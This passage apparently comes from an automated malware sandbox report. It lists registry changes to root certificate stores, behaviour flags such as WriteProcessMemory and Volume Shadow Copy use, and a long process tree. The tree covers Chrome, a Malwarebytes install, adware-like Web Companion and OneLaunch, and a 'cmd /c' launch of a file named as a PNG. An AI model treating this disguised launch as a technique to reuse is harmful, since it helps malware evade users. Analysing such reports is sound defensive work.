| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe | N/A |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe | N/A |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\8740-heart.png
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2252 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4684 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4808 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4804 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x234,0x260,0x7ff7ae407688,0x7ff7ae407698,0x7ff7ae4076a8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5528 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3152 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5872 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5796 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3328 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:2
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4904 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3672 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6952 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe
"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x440 0x4e4
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-3.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-4.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-5.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-6.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-7.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-8.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-9.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-12.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-14.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-15.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-17.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-18.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-19.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-20.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-21.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-23.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-24.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-25.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-27.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-28.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-29.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-30.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-32.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-33.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-34.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-35.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-36.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-37.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-38.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-39.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-40.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-41.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-42.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-43.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-44.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-45.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-46.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-47.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-48.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-49.exe
ig.exe reseed
C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status on true /updatesubstatus none /scansubstatus none /settingssubstatus none
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=1036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3696 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6868 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5672 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6864 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6104 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6188 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6676 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5588 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6996 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5884 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5884 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3684 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7140 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
